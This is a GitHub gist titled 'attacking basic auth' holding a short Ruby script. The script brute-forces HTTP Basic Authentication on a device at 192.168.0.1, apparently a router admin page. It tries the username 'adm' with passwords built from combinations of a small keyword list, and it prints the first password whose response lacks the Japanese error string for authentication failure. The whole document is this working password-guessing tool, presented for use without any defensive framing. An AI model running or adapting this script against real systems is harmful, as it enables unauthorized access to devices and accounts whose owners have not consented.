Skip to content

Instantly share code, notes, and snippets.

@iruca3
Created February 4, 2016 06:41
Show Gist options
  • Save iruca3/d08a0c60b33477ac1b6c to your computer and use it in GitHub Desktop.
Save iruca3/d08a0c60b33477ac1b6c to your computer and use it in GitHub Desktop.
attacking basic auth
require 'net/http'
keywords = ['hoge', 'bar', 'mofu']
i = 1
while true
puts "#{i} length challenge."
# repeated_combination is also useful.
keywords.combination(i).each do |keywords|
password = keywords.join('')
uri = URI('http://192.168.0.1')
req = Net::HTTP::Get.new(uri)
req.basic_auth 'adm', password
res = Net::HTTP.start(uri.hostname, uri.port) {|http|
http.request(req)
}
b = res.body.encode('UTF-8', 'EUC-JP', undef: :replace, invalid: :replace)
if b.include?('認証エラー')
puts 'ERROR'
else
puts password
exit(0)
end
end
i += 1
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment